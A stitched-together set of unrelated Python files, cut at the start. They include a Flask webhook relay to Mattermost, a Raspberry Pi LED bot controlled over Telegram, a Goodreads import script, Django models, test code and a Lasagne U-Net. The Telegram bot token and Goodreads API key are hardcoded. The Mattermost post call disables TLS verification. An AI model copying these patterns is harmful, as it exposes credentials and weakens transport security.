return sig2.hexdigest() == signature
def get_travis_public_key():
from urllib.parse import urlparse
import os.path
cfg_url = config.TRAVIS_CONFIG_URL
if urlparse(cfg_url).scheme: ## valid url
response = requests.get(config.TRAVIS_CONFIG_URL, timeout=10.0)
response.raise_for_status()
return response.json()['config']['notifications']['webhook']['public_key']
elif os.path.isfile(cfg_url): ## local file (for testing)
with open(cfg_url, "r") as pkf:
cont = pkf.read()
pubkey = cont.encode()
if not pubkey:
raise RuntimeError("No public key found in {}".format(cfg_url))
return pubkey
else:
raise ValueError("Travis config url '{}' is neither a valid url nor an existing local file path".format(cfg_url))
import OpenSSL.crypto
def check_signature(signature, pubkey, payload):
from OpenSSL.crypto import verify, load_publickey, FILETYPE_PEM, X509
pkey_public_key = load_publickey(FILETYPE_PEM, pubkey)
cert = X509()
cert.set_pubkey(pkey_public_key)
verify(cert, signature, payload, str('sha1'))
@app.route(config.SERVER['hook'] or "/", methods=['GET'])
def alive():
return 'Server Up and Running', 200
@app.route(config.SERVER['hook'] or "/", methods=['POST'])
def root():
if "X-Github-Event" in request.headers:
## assume Github notification, authenticate if needed
if SECRET:
signature = request.headers.get('X-Hub-Signature', None)
if not signature:
return 'Missing X-Hub-Signature', 400
if not check_signature_githubsecret(signature.split("=")[1], SECRET, request.data):
return 'Invalid X-Hub-Signature', 400
json_data = request.json
if not json_data:
print('Invalid Content-Type')
return 'Content-Type must be application/json and the request body must contain valid JSON', 400
try:
return handle_github(json_data, request.headers['X-Github-Event'])
except Exception as ex:
print("Error interpreting github notification: {}".format(ex))
return "Internal error", 400
elif "Travis-Repo-Slug" in request.headers:
payload = request.form.get("payload")
if not payload:
return "Invalid payload", 400
### Travis-CI notification, verify
## adapted from https://gist.github.com/andrewgross/8ba32af80ecccb894b82774782e7dcd4
if config.TRAVIS_CONFIG_URL:
if "Signature" not in request.headers:
return "No signature", 404
import base64
signature = base64.b64decode(request.headers["Signature"])
try:
pubkey = get_travis_public_key()
except requests.Timeout:
print("Travis public key timeout")
return "Could not get travis server public key", 400
except requests.RequestException as ex:
print("Travis public key exception: {0}".format(ex.message))
return "Could not get travis server public key", 400
except Exception as ex:
print("Problem getting public key: {}".format(ex))
return "Internal error", 400
try:
check_signature(signature, pubkey, payload)
except OpenSSL.crypto.Error:
print("Request failed verification")
return "Unauthorized", 404
try:
data = json.loads(payload)
return handle_travis(data)
except Exception as ex:
print("Error interpreting travis notification: {}".format(ex))
return "Internal error", 400
elif "X-Gitlab-Event" in request.headers:
## Gitlab notification, authenticate if needed
if ( not config.GITLAB_SECRET ) or request.headers.get("X-Gitlab-Token", None) != config.GITLAB_SECRET:
return "Invalid X-Gitlab-Token", 400
json_data = request.json
if not json_data:
print('Invalid Content-Type')
return 'Content-Type must be application/json and the request body must contain valid JSON', 400
try:
return handle_gitlab(json_data, request.headers['X-Gitlab-Event'])
except Exception as ex:
print("Error interpreting gitlab notification: {}".format(ex))
return "Internal error", 400
else:
print("Unknown notification type")
return "Unknown notification type", 400
def handle_github(data, event):
from mattermostgithub.github_payload import (
PullRequest, PullRequestComment, Issue, IssueComment,
Repository, Branch, Push, Tag, CommitComment, Wiki
)
msg = ""
if event == "ping":
msg = "ping from %s" % data['repository']['full_name']
elif event == "pull_request":
if data['action'] == "opened":
msg = PullRequest(data).opened()
elif data['action'] == "closed":
msg = PullRequest(data).closed()
elif data['action'] == "assigned":
msg = PullRequest(data).assigned()
elif data['action'] == "synchronize":
msg = PullRequest(data).synchronize()
elif event == "issues":
if data['action'] == "opened":
msg = Issue(data).opened()
elif data['action'] == "closed":
msg = Issue(data).closed()
elif data['action'] == "labeled":
msg = Issue(data).labeled()
elif data['action'] == "assigned":
msg = Issue(data).assigned()
elif event == "issue_comment":
if data['action'] == "created":
msg = IssueComment(data).created()
elif event == "repository":
if data['action'] == "created":
msg = Repository(data).created()
elif event == "create":
if data['ref_type'] == "branch":
msg = Branch(data).created()
elif data['ref_type'] == "tag":
msg = Tag(data).created()
elif event == "delete":
if data['ref_type'] == "branch":
msg = Branch(data).deleted()
elif event == "pull_request_review_comment":
if data['action'] == "created":
msg = PullRequestComment(data).created()
elif event == "push":
if not (data['deleted'] and data['forced']):
if not data['ref'].startswith("refs/tags/"):
msg = Push(data).commits()
elif event == "commit_comment":
if data['action'] == "created":
msg = CommitComment(data).created()
elif event == "gollum":
msg = Wiki(data).updated()
if msg:
hook_info = get_hook_info(data)
if hook_info:
url, channel = get_hook_info(data)
if hasattr(config, "GITHUB_IGNORE_ACTIONS") and \
event in config.GITHUB_IGNORE_ACTIONS and \
data['action'] in config.GITHUB_IGNORE_ACTIONS[event]:
return "Notification action ignored (as per configuration)"
post(msg, url, channel)
return "Notification successfully posted to Mattermost"
else:
return "Notification ignored (repository is blacklisted)."
else:
return "Not implemented", 400
def handle_travis(data):
## repo info
repo_msg = "[{name}]({url})".format(name=data["repository"]["name"], url=data["repository"]["url"])
## status message
buildstatus_msg = "[#{no}]({url}) {status}".format(
no=data["number"],
url=data["build_url"],
status=data["status_message"].lower())
## interpret event
ntype = data["type"]
event_msg = "EVENT_PLACEHOLDER"
if ntype == "push":
event_msg = "pushed commit {commit} on branch {branch} by {author}".format(
commit="[{0}]({1})".format(data["message"].split("\n")[0], data["compare_url"]),
branch=data["branch"],
author=("[{name}](mailto:{mail}){0}".format(
( "" if data["author_name"] == data["committer_name"] and data["author_email"] == data["committer_email"]
else " with [{name}](mailto:{mail})".format(name=data["committer_name"], mail=data["committer_email"]))
, name=data["author_name"], mail=data["author_email"]
)
)
)
elif ntype == "pull_request":
event_msg = "pull request {prid} \"{prtitle}\" by {author}".format(
prid="[#{0}]({1})".format(data["pull_request_number"], data["compare_url"]),
prtitle=data["pull_request_title"],
author="[{name}]({mail})".format(name=data["author_name"], mail=data["author_email"])
)
else:
raise ValueError("Unknown event type {}".format(data["type"]))
msg = "Travis build {build_status} for {event} in {repo}".format(
repo=repo_msg,
build_status=buildstatus_msg,
event=event_msg)
hook_info = get_hook_info(data)
if hook_info:
url, channel = hook_info
post(msg, url, channel)
return "Notification successfully posted to Mattermost"
else:
return "Notification ignored (repository is blacklisted)."
def handle_gitlab(data, event):
import os.path
def puser_link(udata, web_base): ## for push events
nmemail = "[{nm}]({profile})".format(nm=udata["user_name"], profile=os.path.join(web_base, udata["user_username"])) if "user_username" in udata else udata["user_name"]
if config.SHOW_AVATARS:
return " {nm}".format(av=udata["user_avatar"], nm=nmemail)
return nmemail
def user_link(udata, web_base):
nmemail = "[{nm}]({profile})".format(nm=udata["name"], profile=os.path.join(web_base, udata["username"]))
if config.SHOW_AVATARS:
return " {nm}".format(av=udata["avatar_url"], nm=nmemail)
return nmemail
def repo_link(projdata):
return "[{nm}]({url})".format(nm=projdata["path_with_namespace"], url=projdata["homepage"])
def ref_link(ref, repourl):
return "[{nm}]({repourl}/tree/{nm})".format(nm="/".join(ref.split("/")[2:]), repourl=repourl)
def commit_linkmsg(cdata):
return "[`{chsh}`]({curl}) {cmsg}".format(
chsh=cdata["id"][:7]
, curl=cdata["url"]
, cmsg=cdata["message"].split("\n")[0]
)
def issuemrsnippet_link(objdata, url):
return "[#{iid}: {title}]({url})".format(iid=objdata.get("iid", objdata["id"]), title=objdata["title"], url=url)
actionTransl = {
"open" : "opened"
, "close" : "closed"
, "update" : "updated"
, "merge" : "merged"
, "reopen" : "reopened"
, "create" : "created"
, "delete" : "deleted"
}
repoweb = data["repository"]["homepage"] if "repository" in data else data["project"]["web_url"]
webbase = "/".join(repoweb.split("/")[:-2]) ## remove last two paths
attrs = data.get("object_attributes", dict())
msg = None
if event == "Push Hook":
msg = "{user} pushed {ncomm} to {branch} in {repo}\n{commitlist}".format(
user=puser_link(data, webbase)
, repo=repo_link(data["project"])
, branch=ref_link(data["ref"], repourl=repoweb)
, ncomm=("{0:d} commits".format(data["total_commits_count"]) if data["total_commits_count"] > 1 else "a commit")
, commitlist="\n".join("- {}".format(commit_linkmsg(cdata)) for cdata in data["commits"])
)
elif event == "Tag Push Hook":
if data["object_kind"] == "tag_push":
msg = "{user} pushed tag {tag} in {repo}".format(
user=puser_link(data, webbase)
, repo=repo_link(data["project"])
, tag=ref_link(data["ref"], repourl=repoweb)
)
else:
raise ValueError("Tag Push Hook with object_kind={0!r}".format(data["object_kind"]))
elif event == "Note Hook":
ntype = attrs["noteable_type"]
if ntype == "Commit":
objlink = "commit {}".format(commit_linkmsg(data["commit"]))
else:
nttypes = { "MergeRequest" : ("merge_request", "merge request")
, "Issue" : ("issue", "issue")
, "Snippet" : ("snippet", "snippet")
}
if ntype not in nttypes:
raise ValueError("Not a valid noteable_type: '{}'".format(ntype))
else:
issuemrsnippet_url = attrs["url"].split("#")[0]
objlink = "{descr} {link}".format(descr=nttypes[ntype][1], link=issuemrsnippet_link(data[nttypes[ntype][0]], url=issuemrsnippet_url))
msg = "{user} added [a comment]({noteurl}) on {obj} in {repo}\n{note}".format(
user=user_link(data["user"], webbase)
, noteurl=attrs["url"]
, obj=objlink
, repo=repo_link(data["project"])
, note="\n".join("> {}".format(ln) for ln in attrs["note"].split("\n")) ## quote
)
elif event in ("Issue Hook", "Merge Request Hook"):
msg = "{user} {verb} {what} [#{iid}: {title}]({url}) for {repo}{more}".format(
user=user_link(data["user"], webbase)
, verb=actionTransl[attrs["action"]]
, what=" ".join(tok.lower() for tok in event.split(" ")[:-1])
, iid=attrs["iid"], title=attrs["title"], url=attrs["url"]
, repo=repo_link(data["project"])
, more=("\n{}".format("\n".join("> {}".format(ln) for ln in attrs["description"].split("\n"))) if attrs["action"] == "open" and len(attrs["description"]) > 0 else "")
)
elif event == "Wiki Page Hook":
msg = "{user} {verb} wiki page [{title}]({url}) for {project}".format(
user=user_link(data["user"], webbase)
, verb=actionTransl[attrs["action"]]
, title=attrs["title"], url=attrs["url"]
, project="[{name}]({url})".format(name=data["project"]["name"], url=data["project"]["web_url"])
)
elif event == "Pipeline Hook":
pass ## not supported yet
elif event == "Build Hook":
pass ## not supported yet
else:
raise ValueError("Unknown event: {0}".format(event))
if msg:
hook_info = get_hook_info(data)
if hook_info:
url, channel = hook_info
if ( hasattr(config, "GITLAB_IGNORE_ACTIONS") and
( event in config.GITLAB_IGNORE_ACTIONS
or data.get("object_kind", None) in config.GITLAB_IGNORE_ACTIONS ) ):
return "Notification action ignored (as per configuration)"
post(msg, url, channel)
return "Notification successfully posted to Mattermost"
else:
return "Notification ignored (repository is blacklisted)."
else:
return "Not implemented", 400
def post(text, url, channel):
data = {}
data['text'] = text
data['channel'] = channel
data['username'] = config.USERNAME
data['icon_url'] = config.ICON_URL
headers = {'Content-Type': 'application/json'}
r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)
if r.status_code is not requests.codes.ok:
print('Encountered error posting to Mattermost URL %s, status=%d, response_body=%s' % (url, r.status_code, r.json()))
def get_hook_info(data):
keys_to_try = [
## for Github
("repository", "full_name")
, ("organization", "login")
, ("repository", "owner", "login")
, ("repository", "owner", "name")
## for Gitlab
, ("project", "path_with_namespace")
, ("project", "namespace")
## for travis
, ("repository", "url")
, ("repository", "name")
, ("repository", "owner_name")
]
settings = config.MATTERMOST_WEBHOOK_URLS
for keys in keys_to_try:
dt = data
for i,ky in enumerate(keys):
if ky in dt:
dt = dt[ky]
if i == len(keys)-1 and dt in settings:
return settings[dt]
else:
break
return config.MATTERMOST_WEBHOOK_URLS["default"]
if __name__ == "__main__":
app.run(
host=config.SERVER['address'] or "0.0.0.0",
port=config.SERVER['port'] or 5000,
debug=False
)
|
import unittest
from selenium import webdriver
from test_project.pageObjects.Pages.main_page import MainPage
from test_project.pageObjects.Pages.login_page import LoginPage
from test_project.pageObjects.Pages.secure_area_page import SecurePage
class TestLogin(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.maximize_window()
self.driver.get("http://the-internet.herokuapp.com/")
def tearDown(self):
self.driver.quit()
def test_auth_flow(self):
main_page = MainPage(self.driver)
login_page = LoginPage(self.driver)
secure_area = SecurePage(self.driver)
logout_page = LoginPage(self.driver)
main_page.go_login()
login_page.login_fields_("tomsmith", "SuperSecretPassword!")
secure_area.button_with_()
assert login_page.success_message_displayed()
|
import numpy as np
from math import acos, degrees
from util.graph import Graph
u = np.array([-5, -1])
v = np.array([4, 2])
n = u @ v
d = np.linalg.norm(u) * np.linalg.norm(v)
cos_angle = n / d
angle = acos(cos_angle)
print(f'{degrees(angle)} degrees')
g = Graph()
g.add_vector(u, color='b')
g.add_vector(v, color='g')
g.show()
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Bookstore(models.Model):
name = models.CharField(max_length=100)
url = models.CharField(max_length=200)
def __str__(self):
return self.name
class Company(models.Model):
name = models.CharField(max_length=100)
company_email = models.CharField(max_length=60)
bookstores = models.ManyToManyField(Bookstore)
class Meta:
ordering = ['name']
permissions = (
('group_user', 'Can Only View Their Company and Edit Their Information'),
('group_admin', 'Can View nd Edit All Companies and Users')
)
def display_bookstores(self):
return ', '.join(bookstore.name for bookstore in self.bookstores.all())
display_bookstores.short_description = 'Bookstore'
def __str__(self):
return self.name
class Employee(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=100)
company = models.ForeignKey('Company', on_delete=models.CASCADE)
email = models.EmailField(unique=True)
num_queries = models.IntegerField(default=0)
def __str__(self):
output = "{} {}, {}, {}"
return output.format(self.name, self.email, self.company, self.num_queries)
|
# 简单画布
import tkinter
baseFrame = tkinter.Tk()
cvs = tkinter.Canvas(baseFrame, width=300, height=200)
cvs.pack()
# 一条线需要两个点指明起始
# 参数数字的单位是pixel
cvs.create_line(23, 23, 190, 234)
cvs.create_text(56, 67, text="I LOVE PYTHON")
baseFrame.mainloop()
|
import csv
import os
import requests
from flask import Flask, render_template, request
from modal import *
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
# Set up database
engine = create_engine(os.getenv("DATABASE_URL"))
db = scoped_session(sessionmaker(bind=engine))
def main():
f = open("books.csv")
reader = csv.reader(f)
for isbn, title, author, year in reader:
res = requests.get("https://www.goodreads.com/book/review_counts.json", params={"key": "8pV2dRbipRugYtFReyCnw", "isbns": isbn})
if(res.status_code == 200):
res_text = res.json()
for book in res_text["books"]:
id=int(book["id"])
review_count=int(book["reviews_count"])
average_score=float(book["average_rating"])
db.execute('INSERT INTO "book" (id, title, author,year,isbn,reviewcount,averagescore) VALUES (:id, :title, :author, :year, :isbn, :review_count, :average_score)',
{"id": id, "title": title, "author": author, "year": int(year), "isbn": isbn, "review_count": review_count, "average_score": average_score})
db.commit()
if __name__ == "__main__":
with app.app_context():
main()
|
from crummycm.validation.types.placeholders.placeholder import (
KeyPlaceholder,
ValuePlaceholder,
)
from crummycm.validation.types.dicts.foundation.unnamed_dict import UnnamedDict
from crummycm.validation.types.dicts.foundation.known_dict import KnownDict
from crummycm.validation.types.dicts.config_dict import ConfigDict as CD
from crummycm.validation.types.values.element.numeric import Numeric
from crummycm.validation.types.values.element.text import Text
# from crummycm.validation.types.values.base import BaseValue
A_mixed_all_single = {
"my_mixed": CD(
{
"kd_num": Numeric(default_value=int(0), required=False, is_type=int),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
)
}
A_mixed_outter = CD(
{
"kd_num": Numeric(default_value=int(0), required=False, is_type=int),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
)
A_mixed_all_single_nested = {
"my_mixed": CD(
{
"kd_num": Numeric(default_value=int(0), required=False, is_type=int),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
"nested_md": CD(
{
"kd_num": Numeric(
default_value=int(0), required=False, is_type=int
),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
),
}
)
}
A_mixed_outter_nested = CD(
{
"kd_num": Numeric(default_value=int(0), required=False, is_type=int),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
"nested_md": CD(
{
"kd_num": Numeric(default_value=int(0), required=False, is_type=int),
KeyPlaceholder("some_str", ends_with="_str"): Text(),
KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
),
}
)
mixed_all_single_key_unnamed_req_false = {
"my_mixed": CD(
{
"kd_num": Numeric(default_value=int(0), is_type=int),
KeyPlaceholder("some_str", ends_with="_str", required=False): Text(),
KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
)
}
mixed_all_single_key_unnamed_req_false_v_req_false = {
"my_mixed": CD(
{
"kd_num": Numeric(default_value=int(0), is_type=int),
KeyPlaceholder("some_str", ends_with="_str", required=False): Text(
required=False
),
KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
)
}
mixed_all_single_key_unnamed_req_false_v_req_false_default = {
"my_mixed": CD(
{
"kd_num": Numeric(default_value=int(0), is_type=int),
KeyPlaceholder("some_str", ends_with="_str", required=False): Text(
default_value="DIESEL"
),
KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
"wild_card": ValuePlaceholder("wild_card_value"),
}
)
}
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-04 20:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('LedgerBoardApp', '0003_auto_20170704_1854'),
]
operations = [
migrations.AlterField(
model_name='block',
name='blockHash',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='block',
name='target',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='post',
name='publicKeyOfSender',
field=models.CharField(max_length=128),
),
]
|
import unittest
import spelling
class TestNameSpace(unittest.TestCase):
def test_predict(self):
# As such because the built in model is not trained, only all words are added
self.assertIn(spelling.predict("bway"), ["way", "bay", "away", "sway", "tway", "bray"]) |
import time, datetime
import RPi.GPIO as GPIO
import telepot
from telepot.loop import MessageLoop
blue = 6
yellow = 13
red= 19
green= 26
now = datetime.datetime.now()
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
##LED Blue
GPIO.setup(blue, GPIO.OUT)
GPIO.output(blue, 0) #Off initially
#LED Yellow
GPIO.setup(yellow, GPIO.OUT)
GPIO.output(yellow, 0) #Off initially
#LED Red
GPIO.setup(red, GPIO.OUT)
GPIO.output(red, 0) #Off initially
#LED green
GPIO.setup(green, GPIO.OUT)
GPIO.output(green, 0) #Off initially
def action(msg):
chat_id = msg['chat']['id']
command = msg['text']
print ('Received: %s' % command)
message = "comandos"
telegram_bot.sendMessage (chat_id, message)
message = "all on \n all off \n blue on \n yellow on \n red on \n green on \n blue off \n yellow off \n red off \n green off "
telegram_bot.sendMessage (chat_id, message)
if 'on' in command:
message = "on"
if 'blue' in command:
message = message + "blue "
GPIO.output(blue, 1)
if 'yellow' in command:
message = message + "yellow "
GPIO.output(yellow, 1)
if 'red' in command:
message = message + "red "
GPIO.output(red, 1)
if 'green' in command:
message = message + "green "
GPIO.output(green, 1)
if 'all' in command:
message = message + "all "
GPIO.output(blue, 1)
GPIO.output(yellow, 1)
GPIO.output(red, 1)
GPIO.output(green, 1)
message = message + "light(s)"
telegram_bot.sendMessage (chat_id, message)
if 'off' in command:
message = "off "
if 'blue' in command:
message = message + "blue "
GPIO.output(blue, 0)
if 'yellow' in command:
message = message + "yellow "
GPIO.output(yellow, 0)
if 'red' in command:
message = message + "red "
GPIO.output(red, 0)
if 'green' in command:
message = message + "green "
GPIO.output(green, 0)
if 'all' in command:
message = message + "all "
GPIO.output(blue, 0)
GPIO.output(yellow, 0)
GPIO.output(red, 0)
GPIO.output(green, 0)
message = message + "light(s)"
telegram_bot.sendMessage (chat_id, message)
telegram_bot = telepot.Bot('1811246047:AAG8DNKb6csehwWXjXjETnsoZadDuQ_E0eA')
print (telegram_bot.getMe())
MessageLoop(telegram_bot, action).run_as_thread()
print ('Up and Running....')
while 1:
time.sleep(10)
|
from binary_search import binary_search
list = [i for i in range(129)]
list2 = [i for i in range(259)]
# print list
# print binary_search(list,111)
# print binary_search(list,66)
# print binary_search(list,128)
print binary_search(list2,258) |
import theano
import theano.tensor as T
from collections import OrderedDict
import lasagne
from lasagne.layers import InputLayer,Conv2DLayer, ConcatLayer, Pool2DLayer, Deconv2DLayer
from lasagne.layers import ReshapeLayer, DimshuffleLayer, NonlinearityLayer, SliceLayer, DropoutLayer
from lasagne.layers import batch_norm
from lasagne.regularization import regularize_network_params, l2
from sklearn.metrics import f1_score, accuracy_score, roc_auc_score
from sklearn.metrics import roc_curve, recall_score, precision_score
from models.model import Model
PRED_Y_MIN = 1e-10
PRED_Y_MAX = 1
class uNet(Model):
def __init__(self,
X_layer,
n_filters=64,
filter_size=3,
name='unetSoftmax',
pad='valid',
nmb_out_classes=2,
do_dropout=False):
super(uNet, self).__init__(name)
input_shape = X_layer.output_shape
self.build_graph(input_shape, n_filters, filter_size, nmb_out_classes, do_dropout, pad)
self.weights = lasagne.layers.get_all_params(self.net['output_segmentation'], trainable=True)
self.pred_y = lasagne.layers.get_output(self.net['output_for_loss'], X_layer.input_var)
self.outlayer_for_loss = self.net['output_for_loss']
print 'self.outlayer_for_loss.output_shape', self.outlayer_for_loss.output_shape
self.outlayer_seg = self.net['output_segmentation']
self.pred_img_shape = self.outlayer_seg.output_shape[2:]
seg_output = lasagne.layers.get_output(self.outlayer_seg, X_layer.input_var)
print 'self.outlayer_seg.output_shape', self.outlayer_seg.output_shape
if isinstance(X_layer, lasagne.layers.InputLayer):
self.predict_fun = theano.function([X_layer.input_var], seg_output)
self.input_img_shape = input_shape[2:]
self.pred_img_shape = self.outlayer_seg.output_shape[2:]
def build_graph(self, input_shape, n_filters, filter_size, nmb_out_classes, do_dropout, pad):
nonlinearity = lasagne.nonlinearities.rectify
self.net = OrderedDict()
self.net['input'] = InputLayer(input_shape, name='input')
print "Input: self.net['input']", self.net['input'].output_shape
### Conv1
self.net['conv_1_1'] = Conv2DLayer(self.net['input'],
num_filters=n_filters,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "\nConv11: self.net['conv_1_1']", self.net['conv_1_1'].output_shape
self.net['dropout1'] = DropoutLayer(self.net['conv_1_1'], p=0.2)
print "Dropout1: self.net['dropout1']", self.net['dropout1'].output_shape
self.net['conv_1_2'] = Conv2DLayer(batch_norm(self.net['dropout1']),
num_filters=n_filters,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv12: self.net['conv_1_2']", self.net['conv_1_2'].output_shape
self.net['pool1'] = Pool2DLayer(batch_norm(self.net['conv_1_2']), 2)
print "\nPool1: self.net['pool1']", self.net['pool1'].output_shape
### Conv2
self.net['conv_2_1'] = Conv2DLayer(batch_norm(self.net['pool1']),
num_filters=n_filters * 2,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv21: self.net['conv_2_1']", self.net['conv_2_1'].output_shape
self.net['dropout2'] = DropoutLayer(batch_norm(self.net['conv_2_1']), p=0.2)
print "Dropout2: self.net['dropout2']", self.net['dropout2'].output_shape
self.net['conv_2_2'] = Conv2DLayer(batch_norm(self.net['dropout2']),
num_filters=n_filters * 2,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv22: self.net['conv_2_2']", self.net['conv_2_2'].output_shape
self.net['pool2'] = Pool2DLayer(self.net['conv_2_2'], 2)
print "\nPool2: self.net['pool2']", self.net['pool2'].output_shape
### Conv3
self.net['conv_3_1'] = Conv2DLayer(batch_norm(self.net['pool2']),
num_filters=n_filters * 4,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv31: self.net['conv_3_1']", self.net['conv_3_1'].output_shape
self.net['dropout3'] = DropoutLayer(self.net['conv_3_1'], p=0.2)
print "Dropout3: self.net['dropout3']", self.net['dropout3'].output_shape
self.net['conv_3_2'] = Conv2DLayer(batch_norm(self.net['dropout3']),
num_filters=n_filters * 4,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv32: self.net['conv_3_2']", self.net['conv_3_2'].output_shape
self.net['pool3'] = Pool2DLayer(self.net['conv_3_2'], 2)
print "\nPool3: self.net['pool3']", self.net['pool3'].output_shape
### Conv4
self.net['conv_4_1'] = Conv2DLayer(batch_norm(self.net['pool3']),
num_filters=n_filters * 8,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv41: self.net['conv_4_1']", self.net['conv_4_1'].output_shape
self.net['conv_4_2'] = Conv2DLayer(batch_norm(self.net['conv_4_1']),
num_filters=n_filters * 8,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv42: self.net['conv_4_2']", self.net['conv_4_2'].output_shape
self.net['dropout4'] = DropoutLayer(self.net['conv_4_2'], p=0.5)
print "Dropout4: self.net['dropout4']", self.net['dropout4'].output_shape
self.net['pool4'] = Pool2DLayer(self.net['dropout4'], 2)
print "\nPool4: self.net['pool4']", self.net['pool4'].output_shape
### Conv5
self.net['conv_5_1'] = Conv2DLayer(batch_norm(self.net['pool4']),
num_filters=n_filters * 16,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv51: self.net['conv_5_1']", self.net['conv_5_1'].output_shape
self.net['conv_5_2'] = Conv2DLayer(batch_norm(self.net['conv_5_1']),
num_filters=n_filters * 16,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Conv52: self.net['conv_5_2']", self.net['conv_5_2'].output_shape
self.net['dropout5'] = DropoutLayer(self.net['conv_5_2'], p=0.5)
print "Dropout5: self.net['dropout5']", self.net['dropout5'].output_shape
### Deconv1
self.net['deconv1'] = Deconv2DLayer(batch_norm(self.net['dropout5']),
num_filters=n_filters * 8,
filter_size=2,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
stride=2,
crop='valid')
print "\nDeconv1: self.net['deconv1']", self.net['deconv1'].output_shape
self.net['concat1'] = ConcatLayer([self.net['deconv1'], self.net['dropout4']],
cropping=(None, None, "center", "center"))
print "Concat1: self.net['concat1']", self.net['concat1'].output_shape
self.net['convde_1_1'] = Conv2DLayer(self.net['concat1'],
num_filters=n_filters * 8,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde11: self.net['convde_1_1']", self.net['convde_1_1'].output_shape
self.net['convde_1_2'] = Conv2DLayer(batch_norm(self.net['convde_1_1']),
num_filters=n_filters * 8,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde12: self.net['convde_1_2']", self.net['convde_1_2'].output_shape
### Deconv2
self.net['deconv2'] = Deconv2DLayer(batch_norm(self.net['convde_1_2']),
num_filters=n_filters * 4,
filter_size=2,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
stride=2,
crop=pad)
print "\nDeconv2: self.net['deconv2']", self.net['deconv2'].output_shape
self.net['concat2'] = ConcatLayer([self.net['deconv2'], self.net['conv_3_2']],
cropping=(None, None, "center", "center"))
print "Concat2: self.net['concat2']", self.net['concat2'].output_shape
self.net['convde_2_1'] = Conv2DLayer(self.net['concat2'],
num_filters=n_filters * 4,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde21: self.net['convde_2_1']", self.net['convde_2_1'].output_shape
self.net['convde_2_2'] = Conv2DLayer(batch_norm(self.net['convde_2_1']),
num_filters=n_filters * 4,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde22: self.net['convde_2_2']", self.net['convde_2_2'].output_shape
### Deconv3
self.net['deconv3'] = Deconv2DLayer(batch_norm(self.net['convde_2_2']),
num_filters=n_filters * 2,
filter_size=2,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
stride=2,
crop=pad)
print "\nDeconv3: self.net['deconv3']", self.net['deconv3'].output_shape
self.net['concat3'] = ConcatLayer([self.net['deconv3'], self.net['conv_2_2']],
cropping=(None, None, "center", "center"))
print "Concat3: self.net['concat3']", self.net['concat3'].output_shape
self.net['convde_3_1'] = Conv2DLayer(self.net['concat3'],
num_filters=n_filters * 2,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde31: self.net['convde_3_1']", self.net['convde_3_1'].output_shape
self.net['convde_3_2'] = Conv2DLayer(batch_norm(self.net['convde_3_1']),
num_filters=n_filters * 2,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde32: self.net['convde_3_2']", self.net['convde_3_2'].output_shape
